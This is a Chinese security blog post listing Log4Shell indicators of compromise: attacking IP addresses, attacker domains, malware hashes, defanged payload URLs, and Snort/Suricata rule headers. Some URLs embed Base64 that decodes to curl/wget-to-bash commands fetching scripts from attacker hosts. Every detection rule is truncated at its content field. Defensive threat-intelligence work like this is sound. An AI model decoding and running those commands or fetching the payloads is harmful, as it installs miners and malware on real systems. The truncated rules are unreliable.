Log4Shell攻击ip 恶意服务器地址(IOCs)及检测规则

Log4Shell攻击ip 恶意服务器地址(IOCs)及检测规则

关于Log4Shell(CVE-2021-44228)自行参考往期文章:

攻击源ip地址

源IP使用Apache Log4j RCE尝试攻击,其中包含很大部分Tor节点

1.116.59.211
1.14.17.89
103.103.0.141
103.103.0.142
103.214.5.13
104.244.72.115
104.244.72.129
104.244.72.136
104.244.72.7
104.244.73.126
104.244.73.43
104.244.73.85
104.244.73.93
104.244.74.211
104.244.74.55
104.244.74.57
104.244.75.225
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.76.44
104.244.77.139
104.244.77.235
104.244.78.213
104.244.79.6
107.189.1.160
107.189.1.178
107.189.10.137
107.189.10.143
107.189.11.153
107.189.12.135
107.189.13.143
107.189.14.182
107.189.14.76
107.189.14.98
107.189.28.100
107.189.28.241
107.189.29.107
107.189.29.41
107.189.3.244
107.189.31.195
107.189.31.241
107.189.8.65
109.237.96.124
109.70.100.22
109.70.100.23
109.70.100.25
109.70.100.26
109.70.100.27
109.70.100.31
109.70.100.34
109.70.100.36
116.24.67.213
121.4.56.143
121.5.219.20
122.161.50.23
128.31.0.13
133.18.201.195
134.122.34.28
135.148.43.32
137.184.102.82
137.184.104.73
137.184.106.119
137.184.28.58
137.184.99.8
138.68.167.19
139.59.8.39
139.59.97.205
140.246.171.141
142.93.151.166
142.93.34.250
143.110.221.204
143.198.32.72
143.198.45.117
145.220.24.19
146.56.131.161
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.198.103
147.182.215.36
147.182.219.9
150.158.189.96
151.115.60.113
151.80.148.159
152.89.239.12
154.39.255.195
154.94.7.88
157.230.32.67
157.245.109.75
159.203.8.145
159.223.9.17
159.65.155.208
159.65.194.103
159.65.3.102
159.65.58.66
161.35.119.60
162.142.125.193
162.142.125.194
162.142.125.195
162.142.125.196
162.142.125.42
162.142.125.43
162.142.125.44
162.142.125.58
162.142.125.59
162.142.125.60
162.247.74.201
162.247.74.202
162.247.74.206
162.247.74.27
162.247.74.7
162.255.202.246
163.172.157.143
163.172.213.212
164.90.199.216
166.70.207.2
167.248.133.113
167.248.133.114
167.248.133.115
167.248.133.116
167.248.133.41
167.248.133.42
167.248.133.43
167.248.133.44
167.248.133.57
167.248.133.58
167.248.133.59
167.248.133.60
167.71.13.196
167.94.138.113
167.94.138.114
167.94.138.115
167.94.138.116
167.94.138.41
167.94.138.42
167.94.138.43
167.94.138.44
167.94.138.57
167.94.138.58
167.94.138.59
167.94.138.60
167.94.145.60
167.99.164.201
167.99.172.213
167.99.172.58
170.210.45.163
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
175.6.210.66
176.10.104.240
176.10.99.200
178.17.170.135
178.17.170.23
178.17.171.102
178.17.174.14
178.176.202.121
178.176.203.190
178.20.55.16
178.62.79.49
179.43.187.138
18.27.197.252
180.149.231.245
181.214.39.2
185.10.68.168
185.100.86.128
185.100.87.139
185.100.87.174
185.100.87.202
185.100.87.41
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.14.97.147
185.165.169.18
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.1
185.220.101.10
185.220.101.128
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.136
185.220.101.137
185.220.101.138
185.220.101.139
185.220.101.14
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.146
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.16
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.166
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.19
185.220.101.190
185.220.101.191
185.220.101.2
185.220.101.21
185.220.101.3
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.40
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.47
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.59
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.101.7
185.220.101.9
185.220.102.241
185.220.102.242
185.220.102.243
185.220.102.245
185.220.102.246
185.220.102.249
185.220.102.250
185.220.102.252
185.220.102.253
185.220.102.254
185.220.102.4
185.220.102.6
185.220.102.7
185.220.102.8
185.220.103.117
185.220.103.119
185.220.103.4
185.220.103.5
185.220.103.7
185.220.103.8
185.232.23.46
185.236.200.117
185.38.175.130
185.38.175.131
185.38.175.132
185.4.132.183
185.56.80.65
185.83.214.69
188.120.246.215
188.166.122.43
188.166.223.38
188.166.225.104
188.166.48.55
188.166.74.97
188.166.92.228
191.232.38.25
192.160.102.169
192.42.116.19
192.81.130.207
192.99.152.200
193.110.95.34
193.189.100.195
193.189.100.196
193.189.100.201
193.189.100.202
193.189.100.203
193.218.118.183
193.218.118.231
193.239.232.101
193.239.232.102
193.31.24.154
194.135.33.152
194.163.133.36
194.163.45.31
194.48.199.78
195.123.247.209
195.176.3.19
195.176.3.24
195.19.192.26
195.206.105.217
195.251.41.139
195.254.135.76
197.246.171.83
198.144.121.43
198.96.155.3
198.98.51.189
198.98.57.191
198.98.57.207
198.98.60.19
199.195.250.77
199.195.253.162
199.217.117.92
199.249.230.110
199.249.230.158
20.205.104.227
20.71.156.146
204.8.156.142
205.185.115.217
205.185.115.45
205.185.117.149
205.185.126.167
205.185.127.35
206.189.20.141
209.127.17.234
209.127.17.242
209.141.34.232
209.141.36.206
209.141.41.103
209.141.45.189
209.141.45.227
209.141.49.232
211.154.194.21
212.109.197.1
212.192.216.30
212.192.246.95
212.193.57.225
212.47.237.67
213.202.216.189
213.61.215.54
213.95.149.22
216.218.134.12
221.199.187.100
23.120.182.121
23.129.64.131
23.129.64.132
23.129.64.133
23.129.64.135
23.129.64.137
23.129.64.139
23.129.64.140
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.129.64.149
23.154.177.2
23.154.177.4
23.154.177.7
23.160.193.176
23.183.83.71
23.184.48.209
3.94.114.30
31.42.184.34
31.42.186.101
35.76.31.198
37.120.232.51
37.123.163.58
37.19.212.104
37.228.129.109
45.12.134.108
45.129.56.200
45.13.104.179
45.130.229.168
45.137.184.31
45.137.21.9
45.15.16.70
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.153.160.140
45.153.160.2
45.154.255.147
45.155.205.233
45.61.185.54
45.61.186.225
46.105.95.220
46.166.139.111
46.173.218.146
46.182.21.248
46.4.51.212
47.254.127.78
5.157.38.50
5.182.210.216
5.183.209.217
5.199.143.202
5.2.70.140
5.2.72.73
51.15.180.36
51.15.43.205
51.15.59.15
51.15.76.60
51.255.106.85
51.75.161.78
51.77.52.216
54.173.99.121
60.31.180.149
61.19.25.207
62.102.148.68
62.102.148.69
62.210.130.250
62.76.41.46
64.113.32.29
66.220.242.222
68.183.198.247
68.183.44.143
68.79.17.59
72.223.168.73
79.146.170.248
80.71.158.44
81.17.18.59
81.17.18.60
81.17.18.61
81.17.18.62
82.221.131.71
85.93.218.204
87.118.110.27
88.80.20.86
89.163.154.91
89.163.252.230
89.163.252.30
89.249.63.3
89.35.30.236
91.203.5.146
91.219.237.21
92.223.89.187
92.242.40.21
94.142.241.194
94.230.208.147
95.214.54.97
128.199.15.215
128.199.222.221
134.209.24.42
134.209.82.14
137.184.98.176
138.197.106.234
138.197.108.154
138.197.167.229
138.197.193.220
138.197.216.230
138.197.72.76
138.197.9.239
138.68.155.222
138.68.250.214
139.59.101.242
139.59.103.254
139.59.108.31
139.59.163.74
139.59.182.104
139.59.188.119
142.93.157.150
143.110.221.219
143.198.180.150
143.198.183.66
147.182.179.141
147.182.187.229
147.182.216.21
157.245.129.50
159.203.187.141
159.203.45.181
159.203.58.73
159.223.42.182
159.223.61.102
159.89.115.238
159.89.122.19
159.89.133.216
159.89.146.147
159.89.150.150
159.89.154.102
159.89.154.185
159.89.154.64
159.89.154.77
159.89.48.173
159.89.94.219
161.35.155.230
161.35.156.13
164.92.254.33
165.22.201.45
165.227.32.109
165.227.37.189
165.232.80.166
165.232.80.22
165.232.84.226
165.232.84.228
167.172.94.250
167.99.172.99
167.99.186.227
167.99.204.151
167.99.221.217
167.99.221.249
167.99.36.245
167.99.88.151
174.138.6.128
178.128.226.212
178.128.232.114
178.62.23.146
178.62.32.211
188.166.102.47
188.166.105.150
188.166.45.93
188.166.76.204
188.166.86.206
46.101.223.115
51.195.45.190
64.227.67.110
67.205.170.85
68.183.192.239
68.183.198.36
68.183.207.73
68.183.33.144
68.183.35.171
68.183.36.244
68.183.41.150

恶意攻击者服务器/域名地址及hash值

Log4Shell攻击ip 恶意服务器地址(IOCs)及检测规则
ioc_category	ioc
DOMAIN	bvprzqhoz7j2ltin.onion.ly
DOMAIN	bvprzqhoz7j2ltin.onion.ws
DOMAIN	bvprzqhoz7j2ltin.tor2web.su
DOMAIN	log.exposedbotnets.ru
DOMAIN	nazi.uy
HASH	0bb39ba78fc976edb9c26de1cecd60eb
HASH	1348a00488a5b3097681b6463321d84c
HASH	1fe52c0b0139660b2335dd7b7c12ea05
HASH	23b317600f4d82ea58c6b39b6eb5a67c
HASH	2615ebcd4c82d8822ce0b58725938cc6
HASH	40e3b969906c1a3315e821a8461216bb
HASH	6d275af23910c5a31b2d9684bbb9c6f3
HASH	7b72cf30ac42c20f0a14b0b87425c00a
HASH	81fbe69a36650504b88756074a36c183
HASH	95d9a068529dd2ea4bb4bef644f5c4f5
HASH	cf2ce888781958e929be430de173a0f8
HASH	d20478a01344026a0ecd60b0b29e9bc1
HASH	f14019c55e7ce19d93838a4b2f6aec12
HASH	0579a8907f34236b754b07331685d79e
HASH	07b7746b922cf7d7fa821123a226ed36
HASH	dbc9125192bd1994cbb764f577ba5dda
HASH	648effa354b3cbaad87b45f48d59c616
HASH	ccef46c7edf9131ccffc47bd69eb743b
IP_PORT	110.42.239.3:80
IP_PORT	114.132.231.19:80
IP_PORT	121.41.109.54:2204
IP_PORT	159.89.182.117:80
IP_PORT	18.228.7.109:80
IP_PORT	210.141.105.67:80
IP_PORT	45.130.229.168:9999
SLD	*.exposedbotnets.ru
SLD	*.nmsl.run
SLD	*.viperdns.xyz
SLD	*.wdnmdnmsl.xyz
URL	http[:]//110.42.239.3/2.hta
URL	http[:]//114.132.231.19/0.hta
URL	http[:]//114.132.231.19/OK1.hta
URL	http[:]//114.132.231.19/hfs.exe
URL	http[:]//114.132.231.19/2.hta
URL	http[:]//138.197.206.223/.x/xmra64
URL	http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL	http[:]//18.228.7.109/.log/pty3;
URL	http[:]//18.228.7.109/.log/pty2;
URL	http[:]//18.228.7.109/.log/log
URL	http[:]//18.228.7.109/.log/pty4;
URL	http[:]//18.228.7.109/.log/pty5;
URL	http[:]//18.228.7.109/.log/pty1;
URL	http[:]//18.228.7.109/.log/pty2
URL	http[:]//18.228.7.109/.log/pty5
URL	http[:]//18.228.7.109/.log/pty3
URL	http[:]//18.228.7.109/.log/
URL	http[:]//18.228.7.109/.log/pty1
URL	http[:]//18.228.7.109/.log/pty4
URL	http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL	http[:]//34.221.40.237/.x/
URL	http[:]//45.130.229.168:9999/Exploit.class
URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/lh.sh
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//62.210.130.250/web/admin/
URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	185.154.53.140:80
URL	http[:]//185.154.53.140/mg
URL	http[:]//185.154.53.140/o
URL	http[:]//185.154.53.140/s
URL	http[:]//185.154.53.140/get
URL	http[:]//185.154.53.140/ms
URL	http[:]//138.197.206.223/.x/xmra64
URL	http[:]//138.197.206.223/.x/xmra32
URL	http[:]//18.228.7.109/.log/pty1
URL	http[:]//18.228.7.109/.log/pty4
URL	http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL	http[:]//18.228.7.109/.log/pty2
URL	http[:]//18.228.7.109/.log/pty3
URL	http[:]//18.228.7.109/.log/pty5
URL	http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL	http[:]//18.228.7.109/.log/log
URL	http[:]//82.118.18.201/cron.sh
URL	http[:]//92.242.40.21/lh2.sh
URL	http[:]//185.191.32.198/lh.sh
URL	http[:]//82.118.18.201/curl-amd64
URL	http[:]//82.118.18.201/libsystem.so
URL	http[:]//82.118.18.201/kinsing
URL	http[:]//82.118.18.201/lh.sh
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//62.210.130.250/lh.sh
URL	http[:]//80.71.158.12/libsystem.so
URL	http[:]//80.71.158.12/curl-amd64
URL	http[:]//80.71.158.12/lh.sh
URL	http[:]//185.191.32.198/unk.sh
URL	http[:]//45.137.155.55/cron.sh
URL	http[:]//185.191.32.198/ex.sh
URL	http[:]//45.137.155.55/ex.sh

URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//80.71.158.12/curl-amd64
URL	http[:]//92.242.40.21/kinsing
URL	http[:]//92.242.40.21/curl-amd64
URL	http[:]//45.137.155.55/kinsing
URL	http[:]//195.19.192.28/kinsing
URL	http[:]//185.191.32.198/lh.sh
URL	http[:]//80.71.158.44/lh.sh
URL	http[:]//62.210.130.250/lh.sh
URL	http[:]//92.242.40.21/lh.sh
URL	http[:]//92.242.40.21/lh2.sh
HASH	07b7746b922cf7d7fa821123a226ed36
HASH	0e1a1382d4fd420f8a5ae1d88b3085e7
HASH	40e3b969906c1a3315e821a8461216bb
HASH	648effa354b3cbaad87b45f48d59c616
URL	http[:]//45.130.229.168:1389/Exploit
IP_PORT	45.130.229.168:1389
IP_PORT	78.31.71.248:1389
URL	http[:]//78.31.71.248:1389/lewrgz
URL	http[:]//134.209.163.248/callback/
IP_PORT	45.155.205.233:5874
URL	http[:]//45.155.205.233:5874/87.138.139.76:443
IP_PORT	45.155.205.233:12344
URL	http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0Myl8YmFzaA==

URL	http[:]//015ed9119662.bingsearchlib.com:39356/a
URL	http[:]//32fce0c1f193.bingsearchlib.com:39356/a
URL	http[:]//3be6466b6a20.bingsearchlib.com:39356/a
URL	http[:]//6c8d7dd40593.bingsearchlib.com:39356/a
URL	http[:]//7faf976567f5.bingsearchlib.com:39356/a
URL	http[:]//e86eafcf9294.bingsearchlib.com:39356/a
SLD	*.bingsearchlib.com
IP_PORT	80.71.158.12:5557
IP_PORT	45.155.205.233:12344
URL	http[:]//80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=
URL	http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK
URL	http[:]//80.71.158.12/lh.sh
IP_PORT	80.71.158.12:80
IP_PORT	45.155.205.233:5874
URL	http[:]//62.210.130.250/web/admin/x86
URL	http[:]//62.210.130.250/web/admin/x86_g
URL	http[:]//62.210.130.250/web/admin/x86_64
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//80.71.158.12/libsystem.so
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//45.137.155.55/ex.sh
URL	http[:]//45.137.155.55/kinsing
URL	http[:]//80.71.158.12/libsystem.so
URL	http[:]//80.71.158.12/kinsing
URL	http[:]//80.71.158.12/Exploit69ogQNSQYz.class
HASH	3dfbe75871e218d08328a01c56e1bb42
HASH	648effa354b3cbaad87b45f48d59c616
HASH	ccef46c7edf9131ccffc47bd69eb743b
HASH	cf2ce888781958e929be430de173a0f8
HASH	40e3b969906c1a3315e821a8461216bb
HASH	6d275af23910c5a31b2d9684bbb9c6f3
HASH	1348a00488a5b3097681b6463321d84c
HASH	d9f82dbf8733f15f97fb352467c9ab21
HASH	ff171712ab8816f3d7600fe75bb18052
IP_PORT	45.83.193.150:1389
IP_PORT	31.220.58.29:80
URL	http[:]//45.83.193.150:1389/Exploit
URL	http[:]//31.220.58.29/Exploit.class
URL	http[:]//172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd
IP_PORT	172.105.241.146:80
URL	http[:]//18.228.7.109/.log/log
IP_PORT	18.228.7.109:80
HASH	1718956642fbd382e9cde0c6034f0e21
HASH	c717c47941c150f867ce6a62ed0d2d35
HASH	ceb9a55eaa71101f86b14c6b296066c9
HASH	f6e51ea341570c6e9e4c97aee082822b

Snort检测规则

不了解snort的参考以下文章

alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)”; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)”; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper TCP Bypass (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper UDP Bypass (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)”; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; content:”
alert udp $HOME_NET any -> any 53 (msg:”ET POLICY dnslog .cn Observed in DNS Query”; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; content:”
alert udp $HOME_NET any -> any 53 (msg:”ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain”; content:”

Suricata检测规则

Suricata是一个基于开源的入侵检测系统(IDS) 和入侵防御系统(IPS)。它由开放信息安全基金会 (OISF) 开发。测试版于 2009 年 12 月发布,第一个标准版本于 2010 年 7 月发布

alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper TCP Bypass (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; flow:established,to_server; content:”
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; flow:established,to_server; content:”
alert udp $HOME_NET any -> any 53 (msg:”ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain”; content:”
alert udp $HOME_NET any -> any 53 (msg:”ET POLICY dnslog .cn Observed in DNS Query”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper UDP Bypass (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; content:”
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; content:”

附一个Log4Shell 漏洞测试器

https://log4shell.huntress.com/

项目地址

GitHub

转载请注明出处及链接

Leave a Reply

您的电子邮箱地址不会被公开。